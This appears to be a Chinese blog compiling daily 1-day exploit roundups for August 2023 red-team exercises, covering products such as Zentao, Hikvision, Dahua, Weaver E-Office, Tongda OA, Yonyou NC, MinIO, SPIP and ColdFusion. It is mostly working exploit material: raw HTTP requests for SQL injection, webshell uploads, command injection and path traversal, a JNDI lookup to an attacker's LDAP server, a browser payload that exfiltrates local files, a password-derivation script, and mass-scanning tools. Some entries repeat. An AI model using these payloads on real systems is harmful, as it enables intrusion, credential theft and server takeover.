ticket=1;Yakit任意文件读取详情可参考原文有截图复现原文链接：https://mp.weixin.qq.com/s/IQekVs-UU2Slh6V_frpaug前言：yakit是近年新兴的一个BurpSuite平替工具，和burp的区别就在于数据包放过去不用配置ip端口协议这些，但是yakit跑起来感觉卡卡的，远不如burp那么流畅，近期yakit爆出了一个任意文件读取漏洞，此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件触发版本：引擎版本< Yaklang 1.2.4-sp2漏洞条件：使用yakit的MITM代理并且启用任意插件Pyload: const xhr = new XMLHttpRequest(); xhr.open("POST", "http://yakit.com/filesubmit"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(`file={{base64enc(file(C:\\Windows\\System32\\drivers\\etc\\hosts))}}`); 监听脚本#! /bin/python3 import socket # 监听地址和端口 host = '0.0.0.0' port = 23800 # 创建socket服务器 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 绑定并监听端口 server.bind((host, port)) server.listen() # 接收连接并监听请求 print("Listening...") while True: # 接收客户端连接请求 client, address = server.accept() print(f"Connected by {address}") # 读取客户端请求数据 request = '' while True: input_data = client.recv(1024).decode('utf-8') request += input_data if len(input_data) < 1024: break # 提取请求头部 headers = request.split('\n') print("Received headers:") for header in headers: print(header) # 关闭客户端连接 client.close()复现开始：创建一个html页面并插入payload启用MITM代理，不启用插件进行访问：https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1启用MITM代理并启用插件进行访问：https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1原理：yakit默认不会对经过MITM代理的流量中的fuzztag进行解析，但是经过插件时会被解析，所以这也是利用限制。安恒蜜罐2.0.11 提权漏洞package passwd import ( "crypto/sha256" "fmt" "time" ) func Main() { timestamp := time.Now().Unix() date := time.Unix(timestamp, 0).Format("2006-01-02") XXX1 := "1234567890!@#$%^&*()" + date + "root" XXXX1 := sha256.Sum256([]byte(XXX1)) XXXXX1 := fmt.Sprintf("%x", XXXX1)[:16] VVV1 := "1234567890!@#$%^&*()" + date + "operator" VVVV1 := sha256.Sum256([]byte(VVV1)) VVVVV1 := fmt.Sprintf("%x", VVVV1)[:16] println(fmt.Sprintf("[+] root passwd -> %s", XXXXX1)) println(fmt.Sprintf("[+] operator passwd -> %s", VVVVV1)) }安恒明御运维审计与风险控制系统堡垒机任意用户注册POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 Host: xxx Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 1121 <?xml version="1.0"?> <methodCall> <methodName>web.user_add</methodName> <params> <param> <value> <array> <data> <value> <string>admin</string> </value> <value> <string>5</string> </value> <value> <string>XX.XX.XX.XX</string> </value> </data> </array> </value> </param> <param> <value> <struct> <member> <name>uname</name> <value> <string>deptadmin</string> </value> </member> <member> <name>name</name> <value> <string>deptadmin</string> </value> </member> <member> <name>pwd</name> <value> <string>Deptadmin@123</string> </value> </member> <member> <name>authmode</name> <value> <string>1</string> </value> </member> <member> <name>deptid</name> <value> <string></string> </value> </member> <member> <name>email</name> <value> <string></string> </value> </member> <member> <name>mobile</name> <value> <string></string> </value> </member> <member> <name>comment</name> <value> <string></string> </value> </member> <member> <name>roleid</name> <value> <string>101</string> </value> </member> </struct></value> </param> </params> </methodCall>禅道 16.5 router.class.php SQL注入漏洞POST /user-login.html account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23禅道v18.0-v18.3后台命令执行该poc来自链接：https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa 提取码：zyxa详情自行查看POC: POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1 Host: 127.0.0.1 UserAgent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:109.0)Gecko/20100101Firefox/110.0Accept:application/json,text/javascript,*/*;q=0.01 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Referer:http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create Content-Type:application/x-www-form-urlencoded;charset=UTF-8 X-Requested-With:XMLHttpRequest Content-Length:134 Origin:http://127.0.0.1 Connection:close Cookie:zentaosid=dhjpu2i3g51l6j5eba85aql27f;lang=zhcn;device=desktop;theme=default;tab=qa;windowWidth=1632;windowHeight=783 Sec-Fetch-Dest:empty Sec-Fetch-Mode:cors Sec-Fetch-Site:same-origin vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores= 2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za 辰信景云终端安全管理系统 login SQL 注入漏洞POST /api/user/login captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
- 2023年08月16日
- 44 阅读
- 0 评论
- 0 点赞
2023-08-15
HW情报-2023年8月15日-1day汇总 360 新天擎终端安全管理系统信息泄露漏洞http://ip:port/runtime/admin_log_conf.cacheAdobe ColdFusion 反序列化漏洞CVE-2023-29300POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1 Host: 1.2.3.4:1234 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 400 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip cmd: id argumentCollection= <wddxPacket version='1.0'> <header/> <data> <struct type='xcom.sun.rowset.JdbcRowSetImplx'> <var name='dataSourceName'> <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string> </var> <var name='autoCommit'> <boolean value='true'/> </var> </struct> </data> </wddxPacket>Coremail 邮件系统未授权访问获取管理员账密POC/coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2CVE-2023-27372 SPIP CMS远程代码执行漏洞0x01 漏洞概述漏洞编号：CVE-2023-27372SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码，因为序列化处理不当。0x02 影响版本SPIP < 4.2.10x03 漏洞复现方式一：FOFA语句：app="SPIP"POST /spip/spip.php?page=spip_pass HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: cibcInit=oui Content-Length: 215 Content-Type: application/x-www-form-urlencoded page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot= 这里formulaire_action_args参数需访问路径:/spip.php?page=spip_pass获取，标签为：input，name为:formulaire_action_argspage=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=通过上面的代码我们可以清楚的看到我们执行了 phpinfo()函数，执行结果如下。表示我们成功复现了该漏洞。exphttps://github.com/Pari-Malam/CVE-2023-27372CVE-2023-28432 MinIO集群模式信息泄露漏洞复现0x01 漏洞概述漏洞编号：CVE-2023-28432 CNNVD-202303-1795MinIO是美国MinIO公司的一款开源的对象存储服务器，是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞，由于Minio集群进行信息交换的9000端口，在未经配置的情况下通过发送特殊HPPT请求进行未授权访问，进而导致MinIO对象存储的相关环境变量泄露，环境变量中包含密钥信息。泄露的信息中包含登录账号密码。MinIO 存在信息泄露漏洞，该漏洞源于在集群部署中MinIO会返回所有环境变量，导致信息泄露。0x02 影响版本2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z0x03 漏洞复现方式一:可以通过FOFA进行搜索，搜索的语法格式如下:title="MinIO Browser"漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上，通过BP抓包分析。POST /minio/bootstrap/v1/verify HTTP/1.1 Host: 192.168.126.128:9000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 0 （data数据为空详情复现截图可查看原文链接） https://mp.weixin.qq.com/s/SXAEQ3WSOSo_sqGTXN7S6Q 利用泄露的用户名和密码登录系统。 # -*- coding: utf-8 -*- from urllib.parse import urlsplit import argparse import requests import sys import re import threading from requests.exceptions import RequestException from urllib3.exceptions import InsecureRequestWarning # 自定义请求头字段 headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "Content-Type": "application/x-www-form-urlencoded" } data = { } vulurl=[] #url合规检测执行 def urltest(url): parsed_url = urlsplit(url) if parsed_url.port == "443" and parsed_url.netloc: url="https://"+parsed_url.netloc+"/minio/bootstrap/v1/verify" vultest(url) if parsed_url.netloc and parsed_url.path: url=parsed_url.scheme+"://"+parsed_url.netloc+"/minio/bootstrap/v1/verify" vultest(url) elif parsed_url.netloc: url=url+"/minio/bootstrap/v1/verify" vultest(url) elif (not parsed_url.scheme) and parsed_url.path: url_1="http://"+url+"/minio/bootstrap/v1/verify" vultest(url_1) url_2="https://"+url+"/minio/bootstrap/v1/verify" vultest(url_2) else: modified_string = re.sub(r"[/\\].*", "/minio/bootstrap/v1/verify", url) url_1="http://"+modified_string vultest(url_1) url_2="https://"+modified_string vultest(url_2) #漏洞检测 def vultest(url): try: response = requests.post(url, data=data, headers=headers, verify=False , timeout=3) parsed_url = urlsplit(url) url=parsed_url.scheme+"://"+parsed_url.netloc # 检查响应头的状态码是否为200 if response.status_code == 200 and ("MinioEnv" in response.text): vulurl.append(url) print(url+" [+]漏洞存在！！！") else: print(url+" [-]漏洞不存在。") except RequestException: parsed_url = urlsplit(url) url=parsed_url.scheme+"://"+parsed_url.netloc print(url+" [-]请求失败。") #读取url或file def main(): # 禁用警告 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) parser = argparse.ArgumentParser(description="读取命令行参数") group = parser.add_mutually_exclusive_group(required=True) group.add_argument('-u', '--url', help='URL 参数') group.add_argument('-f', '--file', help='file 参数') args = parser.parse_args() if args.url: urltest(args.url) elif args.file: threads_queue=[] with open(args.file, 'r') as file: for line in file: line=line.strip() read_thread = threading.Thread(target=urltest, args=(line,)) threads_queue.append(read_thread) read_thread.start() for thread in threads_queue: thread.join() print("\n存在漏洞列表：") for url in vulurl: print(url+" [+]漏洞存在！！！") if __name__ == "__main__": main()Eramba任意代码执行漏洞GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1 Host: [redacted] Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://[redacted]/settings Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close HTTP/1.1 500 Internal Server Error Date: Fri, 31 Mar 2023 12:37:55 GMT Server: Apache/2.4.41 (Ubuntu) Access-Control-Allow-Origin: * Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Disposition: attachment; filename="test.pdf" X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2033469 <!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Error: The exit status code '127' says something went wrong: stderr: "sh: 1: --dpi: not found " stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether [redacted] brd ff:ff:ff:ff:ff:ff inet [redacted] brd [redacted] scope global ens33 valid_lft forever preferred_lft forever inet6 [redacted] scope link valid_lft forever preferred_lft forever " command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html' '/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>GDidees CMS任意文件上传漏洞复现与利用分析0x01 漏洞概述漏洞编号：CVE-2023-27178GDidees CMS是法国一款开源的网站管理工具，可用于创建站点、照片或视频库。GDidees CMS 3.9.1及以下版本存在任意文件上传漏洞，允许未经授权的攻击者上传精心构造的文件并执行任意代码。0x02 影响版本GDidees CMS 3.9.1及以下。0x03 漏洞复现创建文件格式为phar的一句话木马文件。访问Roxy Fileman插件页面。上传木马此时我们发现，携带参数cmd=echo ‘csx lab’;访问cmd.phar页面，可以看到php代码成功执行。证明漏洞存在。修复意见：修改conf.json文件中的FORBIDDEN_UPLOADS字段，禁止上传phar格式的文件。gitlab路径遍历读取任意文件漏洞可能需要登录GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2FpasswdHIKVISION iSecure Center综合安防管理平台文件上传POST /center/api/files;.js HTTP/1.1 Host: x.x.x.x User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 258 Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4 --e54e7e5834c8c50e92189959fe7227a4 Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt" Content-Type: application/octet-stream 9YPQ3I3ZS #!usr/bin/env python # *-* coding:utf-8 *-* import sys import requests import string import random import urllib3 urllib3.disable_warnings() proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理，方便burpsuit抓包 } def run(arg): try: flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9)) filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10)) vuln_url=arg+"center/api/files;.js" headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'} file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')} r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies) if r.status_code==200 and "webapps/clusterMgr" in r.text: payload=f"clusterMgr/{filename}.txt;.js" url=arg+payload r2 = requests.get(url, timeout=15, verify=False, proxies=proxies) if r2.status_code==200 and flag in r2.text: print('\033[1;31;40m') print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址：{url}") print('\033[0m') else: print(arg+":不存在漏洞") except: print(arg+":不存在漏洞") if __name__ == '__main__': url=sys.argv[1] run(url) HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POCPOST /center/api/files;.html HTTP/1.1 Host: 10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a-- ----WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%jsp 的马%> ------WebKitFormBoundary9PggsiM755PLa54a--HiKVISION 综合安防管理平台 report 任意文件上传漏洞POST /svm/api/external/report HTTP/1.1 Host: 10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a-- ----WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%jsp 的马%> ------WebKitFormBoundary9PggsiM755PLa54a-- 马儿路径：/portal/ui/login/..;/..;/new.jsp华天动力 oa SQL 注入POC:访问http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx抓包POST /report/reportServlet?action=8 HTTP/1.1 Host: xxxx Content-Length: 145 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://xxx/ Content-Type: application/x-www-form-urlencoded User- Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParams Id=100xxx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3 Connection: close year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2Fs howReport.jsp%3Fraq%3D%252FJourTemp2.raq&currTab=HiKVISION 综合安防管理平台 env 信息泄漏POC:/artemis-portal/artemis/envHIKVISION 视频编码设备接入网关 showFile.php 任意文件下载POC:<?php $file_name = $_GET['fileName']; $file_path = '../../../log/'.$file_name; $fp = fopen($file_path, "r"); while($line = fgets($fp)){ $line = nl2br(htmlentities( $line, ENT_COMPAT, "utf-8")); echo '<span style="font- size:16px">'.$line.'</span>'; } fclose($fp);?> /serverLog/showFile.php?fileName=../web/html/main.php大华智慧园区综合管理平台 video 任意文件上传漏洞POC:POST /publishing/publishing/material/file/video HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 804 Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 Accept-Encoding: gzip, deflate Connection: close --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" Test --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data;HIKVISION视频编码设备接入网关 showFile.php 任意文件下载POC:<?php $file_name = $_GET['fileName']; $file_path = '../../../log/'.$file_name; $fp = fopen($file_path, "r"); while($line = fgets($fp)){ $line = nl2br(htmlentities( $line, ENT_COMPAT, "utf-8")); echo '<span style="font- size:16px">'.$line.'</span>'; } fclose($fp);?> /serverLog/showFile.php?fileName=../web/html/main.php大华智慧园区综合管理平台 video 任意文件上传漏洞POC:POST /publishing/publishing/material/file/video HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 804 Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 Accept-Encoding: gzip, deflate Connection: close --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" Test --dd8f988919484abab3816881c55272a7 Content-Disposition: form-data; name="Submit" submit --dd8f988919484abab3816881c55272a7-- 路径/publishingImg/VIDEO/230812152005170200.jsp大华智慧园区综合管理平台 getFaceCapture SQL 注入漏洞POC:/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D禅道 v18.0-v18.3 后台命令执行POC:POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 134 Origin: http://127.0.0.1 Connection: close Cookie: zentaosid=dhjpu2i3g51l6j5eba85aql27f; lang=zh- cn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores= 2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
- 2023年08月15日
- 55 阅读
- 0 评论
- 0 点赞
2023-08-14
HW情报-2023年8月14日-1day汇总泛微 E-Office9 文件上传漏洞 CVE-2023-2648简介Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php 存在问题，对参数 Filedata 的操作会导致不受限制的上传。版本本地测试环境 v9.0验证：POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: 192.168.232.137:8082 User-Agent: test Connection: close Content-Length: 493 Accept-Encoding: gzip Content-Type:multipart/form-data;boundary=25d6580ccbac7409f39b085b3194765 e6e5adaa999d5cc85028bd0ae4b85 --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octet-stream <?php phpinfo();?> --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85—修复方案该漏洞已向公众披露并可能被使用,建议及时更新至无漏洞版本。泛微 E-Office9 文件上传漏洞 CVE-2023-2523POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 Host:192.168.233.10:8082 Cache-Control:max-age=0 Upgrade-Insecure-Requests:1 Origin:null Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt Accept-Encoding:gzip, deflate Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection:close ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition:form-data; name="upload_quwan"; filename="1.php." Content-Type:image/jpeg <?phpphpinfo();?> ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt泛微 E-Cology XXE（QVD-2023-16177）附 POC漏洞介绍泛微 e-cology 某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发 XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。漏洞影响范围泛微 EC 9.x 且补丁版本 < 10.58.2泛微 EC 8.x 且补丁版本 < 10.58.2poc 地址：Weaver E-Office9 前台文件包含http://xx.xx.xx/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls通达 OA_CVE-2023-4165&4166sql 注入漏洞简介通达 OA（Office Anywhere 网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是适合各个行业用户的综合管理办公平台影响版本通达 OA 版本 11.10 之前poc-4165GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q =0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1poc-4166GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 Host: 192.168.232.137:8098 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46 Upgrade-Insecure-Requests: 1通达 OA 前台反序列化漏洞暂无 poc，注册号后需要积分购买绿盟堡垒机任意用户密码读取漏洞pocpoc1 /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/a pache2/www/local_user.php&method=login&user_account=admin poc2 /webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd用友 NC Cloud jsinvoke 任意文件上传漏洞漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限漏洞影响用友 NC Cloud网络测绘app="用友-NC-Cloud" 漏洞复现登陆页面验证 POCPOST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName":"nc.itf.iufo.IBaseSPService", "methodName":"saveXStreamConfig", "parameterTypes":[ "java.lang.Object", "java.lang.String" ],"parameters":[ "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/407.jsp" ] }POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: Connection: Keep-Alive Content-Length: 253 Content-Type: application/x-www-form-urlencoded {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())用友移动管理系统 uploadApk.do 任意文件上传漏洞漏洞描述用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限漏洞影响用友移动管理系统网络测绘app="用友-移动系统管理"漏洞复现登陆页面验证 POCPOST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO 3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 